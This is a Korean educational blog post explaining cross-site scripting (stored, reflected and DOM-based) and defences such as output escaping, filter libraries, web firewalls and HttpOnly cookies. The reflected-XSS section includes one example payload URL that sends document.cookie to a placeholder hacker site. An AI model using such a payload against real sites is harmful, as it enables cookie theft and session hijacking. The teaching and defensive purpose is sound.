XSS(Cross Site Scripting)

📌 XSS (Cross Site Scripting)

게시판, 웹 메일 등에 삽입된 악의적인 스크립트에 의해 페이지가 깨지거나 다른 사용자의 사용을 방해하거나 쿠키 및 기타 개인 정보를 특정 사이트로 전송시키는 공격.
(출처 : 네이버 지식백과)

• 가장 널리 알려진 웹 보안 취약점 중 하나.
• 악의적인 사용자가 공격하려는 사이트에 악성 스크립트를 삽입할 수 있는 보안 취약점.
• XSS를 통해 C&C(좀비 PC에 명령을 내리거나 악성 코드를 제어하는 서버)로 리다이렉트 하거나 사용자의 쿠키를 탈취하여 세션 하이재킹 공격을 할 수 있다.

👉 이미 Cascading Style Sheets를 CSS로 부르고 있어 XSS라고 한다.

📌 대표적인 공격 방식

1. Stored XSS

• 공격자가 제공한 데이터가 서버에 저장된 후 지속적으로 서비스를 제공하는 정상 페이지에서 다른 사용자에게 스크립트가 노출되도록 하는 기법이다.
• 지속적으로 공격한다고 하여 Persistent XSS 라고도 한다.
  

1. 해커가 악의적인 스크립트가 담긴 게시물을 등록
2. 데이터베이스에 저장
3. 사용자가 게시물을 읽음
4. 스크립트가 실행됨(쿠키를 탈취당한다던가, 다른 사이트로 리다이렉션되는 공격 등..)

2. Reflected XSS

• 사용자에게 입력 받은 값을 서버에서 되돌려 주는 곳에서 발생한다.

• 웹 어플리케이션의 지정된 파라미터를 사용할 때 발생하는 취약점을 이용한 공격법이다.
  

• 공격용 스크립트가 대상 웹 사이트에 있지 않고 다른 매체 (타 사이트, 이메일)에 포함될 수 있다. (링크를 통해 이동시켜버림)

• 예를 들면 GET 방식으로 검색 기능을 구현한 웹 어플리케이션에
  http://www.사이트?search=<script>loaction.href("http://해커사이트?value="+document.cookie);</script>
  이런식으로 해커에게 사용자의 쿠기값을 전송하게끔 작성할 수 있다.
  (여기서도 script 태그 쓰려니까 안써지네요 ㅎㅎ &lt 이런식으로 쓰면 써짐)

• Stored XSS와 다르게 데이터베이스에 스크립트가 저장되지 않고 응답 페이지로 바로 클라이언트에 전달된다는 차이점이 있다.

3. DOM Based XSS

• 악의적인 스크립트가 포함 된 URL을 사용자가 요청하게 되어 브라우저를 해석하는 단계에서 발생하는 공격.

• 클라이언트 측 코드가 원래 의도와 다르게 실행된다.

• 다른 XSS 공격과 달리 서버 측에서 탐지가 어렵다.
  

• URL과 함께 # 이라는 특수문자를 사용해서 공격한다. (# 이후의 값은 서버로 전송되지 않는 기능을 가지고 있음)
  

📌 대응 방안

1. 입출력 값 검증 (XSS 특수문자 치환)

• lucy-filter 등 오픈 소스 라이브러리 사용 (직접 만들어도 상관은 없음)
• &, <, >, *, ', / 등

2. XSS 방어 라이브러리, 브라우저 확장앱 사용

• XSS 라이브러리를 사용하여 서버 단에서 개발자가 추가하는 것
• 모든 사이트가 안전하다는 보장이 없기 때문에 사용자 스스로 브라우저 확장 앱 중 Anti XSS를 해주는 어플리케이션 설치하여 방어

3. 웹 방화벽 사용

• 웹 방화벽은 웹 공격에 특화되어 있어 XSS 공격 뿐만 아니라 각종 Injection 공격을 효과적으로 방어할 수 있음

4. 쿠키에 HttpOnly 옵션 활성화

• 활성화 하지 않으면 스크립트를 통해 쿠키에 접근 가능하여 Session Hijacking 취약점이 발생한다.
• LocalStorage에 세션 ID,토큰과 같은 민감한 정보를 저장하지 않는다.

reference!

https://www.youtube.com/watch?v=bSGqBoZd8WM
https://noirstar.tistory.com/266
https://jaeseongdev.github.io/development/2021/05/20/XSS/
https://www.leafcats.com/42